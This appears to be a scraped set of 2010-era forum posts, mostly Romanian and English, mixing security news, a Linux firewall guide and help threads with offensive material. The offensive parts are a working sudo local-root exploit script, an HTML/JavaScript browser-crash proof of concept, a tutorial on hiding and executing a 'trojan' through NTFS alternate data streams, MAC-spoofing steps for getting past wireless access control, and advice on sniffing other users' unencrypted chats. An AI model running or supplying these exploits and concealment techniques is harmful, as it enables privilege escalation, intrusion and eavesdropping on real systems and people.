pyth0n3

36 minutes of Video that explains how to attack Wep using Kismet,Aircrack-ng,Cain&Abel http://www.mediafire.com/file/ymzwgzzjdwo/wireless.7z.001 http://www.mediafire.com/file/5egqmhod1zo/wireless.7z.002 http://www.mediafire.com/file/cyunymmggm5/wireless.7z.003 http://www.mediafire.com/file/1bko3zodm1k/wireless.7z.004 http://www.mediafire.com/file/ymbjtmovwjn/wireless.7z.005 http://www.mediafire.com/file/4hcmmzz2zrm/wireless.7z.006 http://www.mediafire.com/file/jnrqmnh2qdi/wireless.7z.007 http://www.mediafire.com/file/e4zgzzmqgzo/wireless.7z.008 http://www.mediafire.com/file/nt2dgkrzm32/wireless.7z.009 http://www.mediafire.com/file/vduwm1kttmk/wireless.7z.010 http://www.mediafire.com/file/yw5mb2tymtg/wireless.7z.011 http://www.mediafire.com/file/yjlmdwhymz2/wireless.7z.012 http://www.mediafire.com/file/yeonqm4qgen/wireless.7z.013 http://www.mediafire.com/file/nwtwzm4vmjm/wireless.7z.014 No password request Please report broken links if exist , I will fix any broken links to make it download Download all the data and put it in one directory , then try to extract the first , it will extract all the data in that directory . You must first download all the data cause the archive was split in 14 parts

Vezi doar singura problema e ca pe multe forumuri nu te lasa sa te loghezi daca esti un google bot .Mi-am dat seama pt ca eu aveam setat un User Agent cu Google bot iar dupa login ma scoteau astia afara si nu reuseam sa intru pana nu am schimbat Userul Agent ,Problema e si cu ceilati boti Msn ,Yahoo Slurp .In rest merge perfect sa navighezi Atentie la login in diverse forumuri ,daca va scoate afara controlati ce User Agent aveti

March 24, 2010 Jay McLaughlin has me worried. I do my online banking from the same home computer the rest of the family uses for Web surfing and online games. I have the McAfee security suite loaded and do regular scans so accessing online banking should be protected. Right? Not really, says McLaughlin, a Certified Information Security Professional and CIO of CNL Bank. Accessing online banking from your everyday PC is just asking for trouble, he says. In fact, the CIO of the Orlando, Florida-based regional bank would like to see all of his customers - both consumers and businesses - access online banking either from a dedicated machine or from a self-booting CD-ROM running Ubuntu Linux and Firefox. The Ubuntu option Recognizing that most consumers don't want to buy a separate computer for online banking, CNL is seriously considering making available free Ubuntu Linux bootable "live CD" discs in its branches and by mail. The discs would boot up Linux, run Firefox and be configured to go directly to CNL Bank's Web site. "Everything you need to do will be sandboxed within that CD," he says. That should protect customers from increasingly common drive-by downloads and other vectors for malicious code that may infect and lurk on PCs, waiting to steal the user account names, passwords and challenge questions normally required to access online banking. A bootable CD works because it's isolated from the host PC environment. Malware on the host can't touch it - and any malware picked up when running from the CD-ROM goes away once the CD is ejected. "When you eject the CD you have removed everything off the machine," McLaughlin says. He thinks that security suites are increasingly ineffective at keeping up with threats from organized crime rings abroad, such as the Russian Business Network. Right now business users are feeling the heat, but he says consumers are being targeted as well. He's so worried about drive by downloads, in fact, that he uses Firefox with the Noscript plug-in, which won't allow any JavaScript to execute on his PC without his explicit permission. "If you are using online banking you should be using a hardened system that is not used for anything else but online banking," McLaughlin says. While the FDIC, American Banking Association and Federal Financial Institutions Examination Council have come out with similar recommendations for commercial customers, McLaughlin says consumers need to follow them as well. Raimund Genes, chief technology officer at security software vendor Trend Micro, calls the security measures used for online banking in the U.S. "a joke." Any key logger can grab the user name, password and answers to challenge questions that banks commonly use to authenticate users today, he says. Going out of band Genes says using your regular home PC is acceptable for online banking so long as the bank supports two-factor authentication. For example, some banks in Europe use a transaction authentication number, an authentication code that's sent to the user "out of band," such as via SMS to a cell phone. The user then enters the code into the Web browser to complete a transaction online. The code changes every time the user makes a new request. Another alternative is a smart token, such as an RSA token. Barring that, he says, "I would not do online banking at all. Or if I had to I would use a sandboxed browser. I would boot up a mini Linux system from a USB stick." CNL Bank currently offers out of band authentication only when setting up an initial password on a new online account or for password reset requests. The authentication code can be transmitted via SMS, using an automated attendant that calls a phone number that the customer has set up in advance, or through e-mail (although McLaughlin says the e-mail option may be discontinued because a compromised machine may have compromised e-mail as well). McLaughlin is also considering offering this mechanism as an authentication option each time the user logs in, and CNL may offer an even more granular option that requires out of band authentication for individual transactions - for example, for commercial customers with high risk transactions such as wire transfers. Flash or CD-ROM? When accessing online banking, consumers may want to consider using a secure, bootable flash drive running an environment such as U3 or MojoPak, says John Pescatore, analyst with Gartner Inc. But banks like the idea of the Ubuntu distribution because the software is free and the media is much cheaper than a memory stick. The problem with both is that the user now has to carry something to access online banking. "They hate that. That's why this approach has never broken into the mainstream," Pescatore says. Consumers could also access online banking from a separate, bootable partition on their PC, but that's probably more work than most consumers would put up with. Another alternative, hosting a separate virtual machine (VM), is better than nothing. But McLaughlin cautions that the VM is still not totally isolated from the PC. Malware that targets the hypervisor layer underlying the VM may find its way around those defenses. Everyone is unanimous on one point, however: Nobody seems to think doing online banking from the machine you use every day for Web surfing and e-mail is a good idea. McLaughlin thinks the bootable Ubuntu CD option may be the best alternative right now. Regardless of who you bank with, he suggests ordering a copy of the free Ubuntu Desktop Edition selt-booting CD (If you don't want to wait you can download the image and burn it on a CD yourself) and try it for your online banking. McLaughlin and Genes put a sufficient scare into me that I've decided to give it a go. Yes, it's a hassle to reboot for online banking - until you think of what could happen if someone stole your credentials. On the plus side, I'll be exposed to Linux on a regular basis. Who knows? I might decide that I like running Linux for more than just online banking. computerworld.com

Vezi daca are instalat driverul intai si ce fel de client folosesti pt Network -Manager ? Si bineinteles descrie mai mult ca sa integem asa vei avea un raspuns mai clar .

Pai daca puneti reteaua in promiscuous mode puteti intercepta toate conversatiile astea cu oricare sniffer de exemplu Wireshark pt ca nu vin criptate pt yahoo messenger . Daca nu e in promiscuous veti vedea doar conversatiile voastre In linux se poate face cu urmatorul command To enable the promiscuous mode ifconfig eth0 promisc To remove promiscuous mode ifconfig eth0 -promisc

As fi si eu prezent la asa ceva pt ca mia placut ceea ce a facut Avram Iancu supranumit "Craisorul Muntilor" .Pt cei care nu au fost recomand sa mearga sa viziteze si Casa Memoriala Avram Iancu pe care eu am vizitato acum 12 ani , care se gaseste in comuna Avram Iancu, venind dinspre orasul Campeni

Nu am fost niciodata in Spania

Uitate putin aici la ce driver sunt compatibili cu Aircrack-ng compatibility_drivers [Aircrack-ng] pt ca este un tool foarte coplet pt wep si wpa.Vezi ce adaptoare sunt mai bune ,eu ti-as recomanda Realtek sau Atheros

pai lam scris eu

In ce sens credite ca nu te inteleg ce ai zis ?

so here i will explain a simple way to hide and execute files in windows system the first thing will be the command attrib Here is the syntax + Sets an attribute. - Clears an attribute. R Read-only file attribute. A Archive file attribute. S System file attribute. H Hidden file attribute. /S Processes matching files in the current folder and all subfolders. /D Processes folders as well. so here is an example: attrib +h trojan.exe so this code will add the hidden attribute to trojan.exe and it will not be seen attrib -h trojan.exe so this command will show the hidden file in aour case trojan.exe Another way to hide files in a NTFS file system wil be the Alternate Data Stream ,so this can also be used in Windows Vista It not works in a FAT file-system So here is a short example of this Go on Start>Run>CMD and now make a folder for this example ,i've made this folder in c: so when you open CMD just type cd c:\ an then make a directory for this example called test mkdir test then go on that directory cd \test So we can beggin We will create a text file called ads.txt that stay for Alternate Data Stream ,and we will hide another text file behind ads.txt So the hidden file will be hidden.txt ad we will put some text in this hidden.txt file. The file ads.txt will be empty so here is the syntax echo This is an Alternate Data Stream hidden file > ads.txt:hidden.txt So the next step will be reading the hidden file so we will type the follow command notepad ads.txt:hidden.txt here we are using notepad to read what is inside the file hidden.txt OK ,so let's see how we can hide and execute an trojan horse ,in the next example i will use the calc.exe tool cause this tool exist in any computer with windows based system So let's say that calc.exe is an trojan horse and we need to hide this trojan behind another file using the Alternate Data Stream In this example we will hide calc.exe in ads.txt file that already have another file hidding so the syntaz will be: type c:\windows\system32\calc.exe > ads.txt:trojan.exe So here we hide calc.exe end we called him trojan.exe Let's execute this ALternate Data Stream start c:\test\ads.txt:trojan.exe so here must apear a simple calc on the screen ,but if this calc was a trojan horse? Another simple way to execute this can also be : start .\ads.txt:trojan.exe So here we need to delete this Alternate Data Stream We can just siple copy the file ads.txt on a usb pen with FAT file-system and all data hidden behind this file will be deleted another way will be . type ads.txt > adscopy.txt del ads.txt ren adscopy.txt ads.txt And we will have an ads.txt file without nothing hidden or pending Countermeasure for Alternate data stream: There are meany tools that can find an ads on your computer Crucialads Crucial Security Programs—Security and Services Streamexplorer Stream Explorer So here are some picture with streamexplorer that i've made to see how can this tool detect ADS ScreenHunter_07 Mar. 13 17.44.gif ScreenHunter_10 Mar. 13 17.46.gif Here you will see all the hidden data behind ads.txt that is an empty file . Another way to hide files can be the Stenography Steganography - Wikipedia, the free encyclopedia and here you can find meany tools to use StegoArchive.Com - Steganography Information, Software, and News to Enhance Your Privacy edit: Writed by pyth0n3

Introduction If I have an option of giving a brief description about firewall I would say “a program or hardware device that filters the information coming through the Internet connection into your private network or computer system. If an incoming packet of information is flagged by the filters, it is not allowed through.“ A firewall does not guarantee security but it is in most environments the first line of defense against network based attacks. Firestarter is a friendly graphical interface that allows you to configure a software firewall in Linux using the built-in IPtables/IPchains utilities. It is an open source GUI firewall program. The software aims to combine ease of use with powerful features, therefore serving both Linux desktop users and system administrators. By the end of this article, the user will be able to install and configure Firestarter and will also be able to live a secure and healthy life... over the internet. Prerequisites This howto assumes you have Ubuntu installed on your machine with internet connection. Note: This tool should NOT be used on any production machine. Install Firestarter Firestarter is very simple "even a caveman can install it". It's contained in most distribution's repositories. In Ubuntu and Debian-based distributions, Firestarter can be installed by running: $sudo apt-get install firestarter This will install Firestarter and all necessary dependencies. Setup Wizard In order to start the Firestarter application, click on System > Administration > Firestarter. When you run Firestarter for the first time it will allow you to setup your initial firewall configuration. In the initial step it will detect your network devices and then gives you the option from drop down menu you to select your network device. You also have an option of enabling dial-out (for modem users) or IP address is assigned via DHCP. If you are using a router for internet connection then check your router's settings to see if you are using DHCP to assign local IP addresses (it would be DHCP a if you did not configured static IP). If you're not using a router, whether or not you have a dynamically-assigned IP address depends upon your Internet Service Provider. Once you check the options according to your network settings, click forward, it will now ask you to configure Internet Connection Sharing. If the system you are installing on is a network computer then you should enable this. You also have to select the device type of your network (mostly a hub or switch). Leave the Internet Connection Sharing disabled if you're not using your computer as a router. Next, it will ask you to save your settings and open Firestarter. The GUI Firestarter main application window consist of three tabs: Status, Events, and Policy. These three tabs are described below: Status This windows gives you the current status of your firewall application; whether it is active, disabled or locked. It consist of three states: Active: Indicates the firewall is up and running Disabled: Indicates the firewall is turned off and all connections are allowed through Locked: Indicates all connections are refused Events Events tab consist of the list of attempted connections that it has blocked it. Here you should focus on the entries that are listed in red, all others should not be considered as a threat. Policy The Policy window is where you define the rules for your firewall. You can create your own policy which includes enabling/disabling of inbound or outbound traffic. And these rules can be applied on hosts or ports. You can create your own rule by right clicking on the desired list of host or ports and then select “Add Rule” For example, you are running an SSH server you want to add a rule on the bottom list, selecting "SSH" for the service name, and Firestarter will automatically fill in the default port (in this case, port 22). You can then set whether you want to allow connects from all addresses ("Anyone"), or whether you want to limit connections by IP address, hostname, or network. It is not recommended to check the “Anyone” option since it could allow anyone to compromise your network security. Assigning an IP/host or network is more secure option. Inbound Policy controls the incoming traffic coming from the internet and the local network to the firewall. The default settings for inbound is appropriate. However, it can create exceptions if you modify the changes in accordance to your needs. The three inbound policy groups are: Allow connections from host: As the name itself is pretty explanatory. It will allow the traffic from the host which you will add here it marks it as a trusted source. Allow service: It consist of two parameters, the service and the target. Firestarter will try to determine the service name itself, but the user is also free to enter the name manually. The target can be one of three choices; Anyone, LAN clients, or a user specified IP, host or network. Forward service: The last inbound policy group is Forward Service. This group is only active if you have enabled Internet Connection Sharing. It also consist of two parts, service and the target Outbound Policy controls outgoing traffic to the Internet from the firewall and any LAN clients. The default outbound policy is permissive. This means you and any clients connected to the local network are able to browse the net, read email, etc. unrestricted. Permissive mode The permissive outbound mode, marked "Allow outbound traffic not denied" on the policy page, allow you to specify rules that limit outbound connections. Restrictive mode The restrictive outbound mode on the other hand, marked "Deny outbound traffic not allowed" on the policy page, means you explicitly specify which connections are allowed out. When this mode is enabled for the first time some basic rules are already present in the system. These rules permit the secured hosts to access the DNS, DHCP and HTTP services so that you do not accidentally end up in a situation where you are unable to reach the web or further assistance. Once you know for sure you wish to enable the restrictive outbound policy, you can freely remove these rules. Preferences Firestarter walks you through the basic steps but in order to experience some advanced features you can go to preferences. Interface Firestarter does not interrupt your work. Here you have an option of minimizing the Firestarter to system tray. By doing so it will not exit the application and Firestarter will be running in the background and will notify you of any suspicious blocked alert by turning its icon in to red. ICMP Filtering The Internet Control Message Protocol (ICMP) provides a way for IP stacks to send simple messages containing information or errors. Here you are able to optimize the ICMP settings. The options “Echo Request” and “Echo Reply” advert to how your firewall handles pings. You can check the option of echo request and it will allow all the outgoing pings. If you would like to block the incoming pings you can check the option of echo reply. ICMP Filtering carries other options as well. One of the option that ICMP filtering consist is Traceroute which can prevent your machine from being traced via traceroute. ToS FilteringThis option allows you to set priority on the use of network traffic. It can set the priorities for the processes of your workstation and server (if you have installed both). In short, you have the option of increasing or decreasing the throughput or reliability for certain applications. Please review Firestarter documentation to learn more. Conclusion “The way to be safe is never to feel secure”. When we use the high-speed internet without having any security tool installed, it gives the enormous opportunity to “them” means the malicious folks on the internet who are desperate to attack on your network and severs. No one can guarantee 100% security but at least you can consider yourself in the loop of reasonable security using Firestarter, without having any prerequisite of in-depth knowledge of TCP/IP security. linuxsecurity.com

9 march 2010 InfoSecNews Software that can be downloaded for use with the Energizer Duo USB battery charger contains a backdoor that could allow an attacker to remotely take control of a Windows-based PC, Energizer and US-CERT is warning. "The installer for the Energizer Duo software places the file UsbCharger.dll in the application's directory and Arucer.dll in the Windows system32 directory," the U.S. Computer Emergency Readiness Team said in an advisory on Friday. "Arucer.dll is a backdoor that allows unauthorized remote system access via accepting connections on 7777/tcp. Its capabilities include the ability to list directories, send and receive files, and execute programs." The Windows software was made available via a download with the Energizer Duo Charger, Model CHUSB, Energizer said in a statement. The battery maker said it does not know how the Trojan got into the software. "Energizer has discontinued sale of this product and has removed the site to download the software," the statement said. "Energizer is currently working with both CERT and U.S. government officials to understand how the code was inserted in the software." For systems with the software installed, US-CERT recommends removing the Energizer Duo software and Arucer.dll file, as well as blocking access to port 7777 via network perimeter devices or firewall software. The Trojan may have been in the software since it was first offered three years ago, according to Symantec. "We were interested in finding out how long this file had been available to the public. The compile time for the file is May 10, 2007. It is impossible to say for sure that this Trojan has always been in this software, but from our initial inspection it appears so," Symantec wrote in a blog post. "The Trojan still operates whether this device is found or not, so a USB charger doesn't need to be plugged in for the Trojan to be functioning." If the Trojan does date back to 2007, that is around the same time that there was a rash of products like digital photo frames hitting U.S. shelves infected with malware, said Marcus Sachs, director of the SANS Internet Storm Center. "This may simply be from that time frame when all the factories in China were not clean and many were putting malware onto stuff, not intentionally but because the hygiene wasn't good," he said in an interview on Monday. "Who knows where the server (hosting the software) is located," he said. "It could have been exposed to the unclean conditions that were rampant there."

-The Prince by Niccolò Machiavelli written in 1513 not published until 1532 The Prince - Wikipedia, the free encyclopedia -Hacker 6.0 by Stuart McClure ,Joel Scambray,George Kurtz -The Magic of Thinking Big by David Schwartz -Letter to a Child Never Born by Oriana Fallaci -VOICE OF THE MASTER by Kahlil Gibran

07 March 2010 offensive-security.com A few days ago, one of my friends (mr_me) pointed me to an application that appeared to be acting somewhat “buggy” while processing “specifically” crafted zip files. After playing with the zip file structure for a while (thanks again, mr_me, for documenting the zip file structure), I found a way to make the application crash and overwrite a exception handler structure. In this article, I will explain the steps I took to build an exploit for this bug. All I’m asking from you, the reader, is to try not just to read this post and take my steps and decisions for granted. Read it, and think about what you see, and try to think about what you would do to fix a certain issue. Whenever a new problem arises, try to see if you can find the solution yourself before continuing to read. In this post, I have placed a few markers. These markers indicate the moment when you should stop reading for a while and think about the current situation, the current questions and issues, and what YOU would do to overcome those issues. continue ...Leaders in Online Information Security Training QuickZip Stack BOF 0day: a box of chocolates

Mar 04, 2010 SAN FRANCISCO -- RSA Conference 2010 -- Russian hackers have written a more sophisticated version of the infamous BlackEnergy Trojan associated with the 2008 cyberattacks against Georgia that now targets Russian and Ukrainian online banking customers. Joe Stewart, a security researcher with SecureWorks, says Russian hackers are using the Trojan spread via the BlackEnergy botnet to hit Russian and Ukrainian banks with a two-pronged attack that steals their customers' online banking credentials and then wages a distributed denial-of-service (DDoS) attack on the banks as a cover: "They may be emptying the bank accounts while the banks are busy cleaning up from the DDoS," Stewart says. Dubbed by Stewart as "BlackEnergy 2," this new version of the Trojan is a full rewrite of the code that features a modular architecture that supports plug-ins that can be written without access to its source code. It currently comes with three different DDoS plug-ins, as well as one for spamming and two for online banking fraud, according to Stewart. And with the ability to target users in Russia and the Ukraine, BlackEnergy 2 is a departure from the tradition where many Russian hackers won't target their fellow countrymen or those from other former Soviet Republic countries. "The rules have changed," Stewart says. "There was once an unwritten rule that they didn't attack their own banks." But like most cybercrime operations, money is money, and the BlackEnergy botnet gang appears to be expanding its operations for more profit. Stewart says he has seen no public release of the development kit for BlackEnergy 2, but he was able to match "fingerprints" in the code of this new version with other source code written by the author. So far the attackers using the Trojan and its new plug-ins against banks in Russian and the Ukraine appear to be infecting banking customers via pay-per-install malware scams -- likely via email, according to Stewart, who has notified Russian and Ukrainian law enforcement authorities about the botnet's new activities. And in an especially nasty twist, one plug-in destroys the victim's hard drive. "Then they can't log into their bank," Stewart says. "But we've not seen that" being used in attacks yet, he says. While the Zeus Trojan remains the most popular Trojan, Stewart says BlackEnergy 2 can do things Zeus cannot, such as stealing online credentials plus DDoS'ing. BlackEnergy 2 also steals the user's private encryption key. Stewart has written an analysis of the Trojan, available here BlackEnergy Version 2 Analysis - Research - SecureWorks. So far the BlackEnergy 2 Trojan is targeting only Russian and Ukrainian online banking customers, but Stewart also has spotted two other banking Trojans that also target only Russian and former Soviet Union banking customers. darkreading.com

This training will end with a final amazing exercise through a step by step live hacking simulation. It will help students at coming back to offensive and defensive hands-on exercises seen during the whole day, thanks to this complete information warfare operation. TEHTRI-Security will be at CANSECWEST 2010 in Vancouver (22-26 march). There, we will give a security training. Training: http://www.tehtri-security.com/Advanced_PHP_Hacking.pdf CanSecWest Applied Security Conference: Vancouver, British Columbia, Canada - TEHTRI-Security

Severity: HIGH To see if your sudo is vulnerable type sudo -V The utility is prone to a local privilege-escalation vulnerability because it fails to correctly validate certain nondefault rules in the 'sudoer' configuration file. This issue occurs in the 'sudo/parse.c' source file. Users in supplementary groups may gain 'root' user privileges. Local attackers could exploit this issue to run arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer. Affected Products Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10 And also other Linux distribution that use Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 ---snip--- #!/bin/sh # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 # local root exploit # March 2010 # automated by kingcope # Full Credits to Slouching echo Tod Miller Sudo local root exploit echo by Slouching echo automated by kingcope if [ $# != 1 ] then echo "usage: ./sudoxpl.sh <file you have permission to edit>" exit fi cd /tmp cat > sudoedit << _EOF #!/bin/sh echo ALEX-ALEX su /bin/su /usr/bin/su _EOF chmod a+x ./sudoedit sudo ./sudoedit $1 --snip--- cheers, kingcope

Ok tanks! Useful things. Can also take a look at this Quick Reference for Nmap Professor_Messer_Nmap_Quick_Reference_Guide.pdf

=============================================================== Mozilla Firefox v3.6 and Opera Long String Crash (0day) Exploit =============================================================== #Vulnerability This bug is a typical result when attacker try to write plenitude String in document.write() function .User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. #Impact MOzilla Crash #Proof of concept copy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of data open in Mozilla Firefox and wait for 15 sec ...... and say Good Bye Mozilla ....... Per usske phele Mozilla k antim darshan kar le Prem se bolo jai maata di Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!! ======================================================================================================================== asheesh.html ======================================================================================================================== <html> <title>asheesh kumar mani tripathi</title> </br>Asheesh kumar Mani Tripathi <head> <script> function asheesh () { var i=24 , anaconda = "XXXX" for(i=24;i >0 ;--i) { anaconda=anaconda+anaconda; } document.write(anaconda); } </script> </head> <body onLoad="asheesh()"></body> </html> # ~ - [ [ : Inj3ct0r : ] ]

A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo What? Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v9.10. Why? The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for training classes and conferences since it does not need a network connection. The Dojo contains everything needed to get started - tools, targets, and documentation. Where? Download Web Security Dojo from Browse Web Security Dojo Files on SourceForge.net. How? To install Dojo you can install and run VirtualBox, then "Import Appliance" using the Dojo's OVF file. Go here for Virtual Box instructions. As of version 1.0 a VMware version is also provided. Who? Sponsored by Maven Security Consulting Inc (performing web app security testing & training since 1996).

Deci in aceste cazuri administratorul seteaza un MAC control pt fiecare client pe care il aproba ca sa se poata conecta la un AP Un simplu sniffer wireless permite sa observi orice MAC de la statie ,in acest caz poti sa il modifici pe al tau ca sa fie unul aprobat. AiroPeek AiroPeek SE 3.0.1 software download - Windows - VersionTracker permite sa vizualizezi adresele MAC , trebuie doar sa monitorizezi acea retea. Dupa care poti schimba adresa ta MAC Windows: inchizi scheda de retea folosesti BWMACHAK.exe C:\>BWMACHAK.exe 0003t4h6d8 ii dai drumul la scheda si ii dai ipconfig/all pt a vedea daca sa schimbat adressa MAC Linux: ifconfig wlan0 down ifconfig wlan0 hw ether 00:45:7j:65:ki:ff ifconfig wlan0 up ifconfig wlan0 Trebuie doar sa folosesti un sniffer ,trebuie sa cunosti putin TCP/IP sau cel putin sa folosesti un sniffer ,sa citesti rezultatele In orice caz pt un Wireless pentesting se vor folosi bineinteles sistemele Linux , au o gramada de tool sunt mult mai compatibile decat windows. Metoda standard a unui attac e urmatoarea 1 footprinting 2 scanning & enumeration (intro singura faza pt retelele wireless) 3 penetration 4 DOS(Denial of Service) Se captureaza pachete ,se analizeaza , se procede cu crack pt password ,WEP sau WPA

jocuri= 0 pt ca nu mai sunt un copil Nu va lipsi bineinteles antenna mea wireless pt ca poate gasesc ceva (nu se stie niciodata) As putea invata si un nou limbaj de programare sau cel putin sa il invat mai bine pe unul care il stiu deja pt ca m-am jucat prea mult cand am fost copil si sigur nu o voi mai face acum pt ca am pierdut mult si daca voi continua asa nu voi deveni un Wannabe (la hacker nici nu ma mai gandesc) Daca as avea 2 zile de vacanta ar fi cel mai mare cadou pt mine pt ca as manca cateva carti despre internetworking si routing pt ca eu sunt sigur ca stiu bine aceste lucruri dar nu cred ca e rau sa le invat mai bine (nu se stie ce am pierdut,sau poate vreun capitol care nu l-am memorat bine). As mai citi ceva despre Linux sistem administration si despre K ernel Linux pt ca am citit foarte multe despre ele dar cu cate citesc mai multe cu atat ma simt un incepator As da bani sa am macar 2-3 zile de vacanta pt a putea invata pt ca in pc am multe pdf dintre care multe le-am scos pe bucati de hartie dar nu au avut ocazia sa fie citite. Pe zii ce trece apar noi vulnerabilitati ,nu ma face sa ma simt bine pt ca nu pot sa ma tin la pas cu ele ,sa inteleg cum functioneaza toate lucrurile. Un lucru e sigur nu voi juca nimic pt ca doar copiii se mai joaca Sigur voi cumpara 2-3 carti inainte sa plec ,sau poate nu pt ca am cumparat deja prea multe si stau in biblioteca ,se depune praful pe ele Le voi lua si le voi citi.. Sigur cand ma voi intoarce voi face niste tutoriale si pt ceilalti Voi incerca sa cunosc singur multe lucruri fara ca sa mai intru pe forum in aceeasi rubrica de Help ,sigur voi face asta in timpul meu liber ,in vacanta pe care abia astept sa vina , Iar daca imi va ramane putin timp liber probabil voi incerca sa invat o limba straina ,sau de exemplu putin din gramatica limbii romane pt ca am vazut multe greseli de exprimare. Sunt atatea lucruri pe care nu reusesc sa le inteleg si nimeni nu reuseste sa imi explice , va trebui sa studiez mult bineinteles si o vacanta este lucul perfect, ideal Nu cred ca ma voi plictisi, nu voi avea timp pt asa ceva ,sigur nu imi va ramane .Probabil voi ajunge acasa cu cateva carti necitite si probabil nu voi intelege indeajuns Cycle While sau For ,pt ca sunt sigur ca le stiu dar mai fac greseli Asta e ,deci nu se pune intrebarea ce voi face fara internet , doar daca cineva crede ca stie foarte bine cum merg lucrurile si e sigur de acest lucru cred ca va avea timp sa faca si altceva ,sau sa joace jocuri ca toti copiii . Nu cred ca exista plictiseala , nu ajunge timp pt cate sunt de invatat

Ar fi bine sa inveti comenzile esentiale BASH A-Z Command Index - Linux Commands in English | howto, examples ,nu e greu ! Sa iti faci un backup (credema ca iti trebuie ) Primul raspuns este ca nu ai nevoie de un Antivirus , este mai sigur decat un sistem Windows, e gratuit , Poate fi in acelasi timp Firewall,Webserver,poti Chatta ,asculta muzica, sa te joci jocuri, sa te ocupi de grafica , bineinteles sa programezi . Acelasi lucru ma intrebam si eu unde sa nu intru ca sa nu stric ceva ,dar am umblat peste tot pt ca eram foarte curios cum functioneaza de asta ziceam Sa iti faci un backup (credema ca iti trebuie ) Daca nu ai de gand sa explorezi noul sistem si iti pui o limita vei cunoaste doar o mica parte din acest sistem care se chiama Linux Ceea ce se intampla e ca multi renunta si se intorc la ceva care nu e gratuit ,are o gramada de virusi ,sì se chiama Windows . Iar Linux ramane instalat pe o mica bucata din hard-disck si vine folosit o data pe luna sau poate mai rar .Putini sunt cei care mai raman cu acest sistem operativ Asa ca dupa ce iti pui cateva intrebari ,vezi cum functioneaza cateva lucruri , poti sa iei o decizie ,depinde doar de tine care va fii .

Daca vrei sa il formatezi poti sa intri in windows la Administrative Tools>Computer Management>Disk Management si stergi partitia unde e instalat ubuntu (Va sterge datele din acea partitie) , nu uita ca va trebui sa reinstalezi un boot-loader pt windows daca nu mai vrei Linux pt ca nu vei reusi sa iti deschizi Windows dupa ce stergi Ubuntu pt ca folosesc acelasi boot-loader GRUB .Oricum nu e o problema poti reinstala boot-loader ul pt windows sau sa instalezi un nou sistem ubuntu in spatiul care tia ramas liber . O alta varianta ar fi sa iti faci un Live Cd cu Gparted un tool Open Source cu care poti sa faci orice fel de partitii intrun hard-disck ,sa le formatezi cu ce fel de filesystem vrei tu ,sa creezi partitii noi Totul folosind un GUI ,nu ar trebui sa fie greu GParted -- Download Dupa ce il descarci va trebui doar sa masterizezi imaginea pe un cd si sa o pui in pc dupa care dai reboot si vei avea la dispozitie tot ce ai nevoie pt a lucra pe un hard-disk Ai grija ce faci pt ca este o munca delicata ,si cei mai experti gresesc Ceea ce trebuie sa stii e ca vei sterge si bootloader-ul in acest caz calculatorul nu va mai putea incarca windows-ul si va trebui sa instalezi un bootloader GNU GRUB - Wikipedia, the free encyclopedia Booting - Wikipedia, the free encyclopedia